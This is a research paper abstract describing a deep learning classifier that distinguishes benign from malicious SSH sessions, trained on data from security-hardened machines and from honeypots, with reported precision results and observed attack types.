Malicious User Profiling Using Honeypots and Deep Learning

Many cloud resources such as virtual machines are managed through remote access. This makes management a lot more convenient however, it also increases exposure to cyber-attacks and specifically to generic attacks such as Bitcoin mining, spamming, ransomware, installing backdoors, etc. With the proliferation of such attacks, their detection has become of major importance. In this paper we present a new supervised learning technique developed to learn and detect the patterns behind these kind of attacks. The goal is to continuously distinguish between benign versus malicious SSH logon sessions. We formulate this as a classification task where a model is trained on benign and malicious SSH sessions. The benign sessions are collected from security hardened machines lacking any attack indicators and the malicious sessions are gathered from dedicated Honeypot machines setup for the sole purpose of luring attackers. As the Honeypots are not actually a part of any real network, only generic attackers log onto them, usually by sweeping IP addresses and guessing passwords. We then train a Deep Neural Net (DNN) to classify the sessions as benign or malicious. Our experiments show that the Average Precision (AP) of this model reaches up to 99%. We also show that simpler ML models achieve AP that is significantly lower. This indicates that learning the attack patterns is not a task which can effectively be mastered by traditional models, hence it is not a trivial task. In addition to statistical measures, we also analyze and present sessions from customer VMs which have been surfaced by the DNN. We manually examined these sessions to show that most of them actually require the attention of security professionals. Among these sessions we witnessed typical attack patterns which include reconnaissance, running Bitcoin miners, ransomware and other suspicious processes on target machines.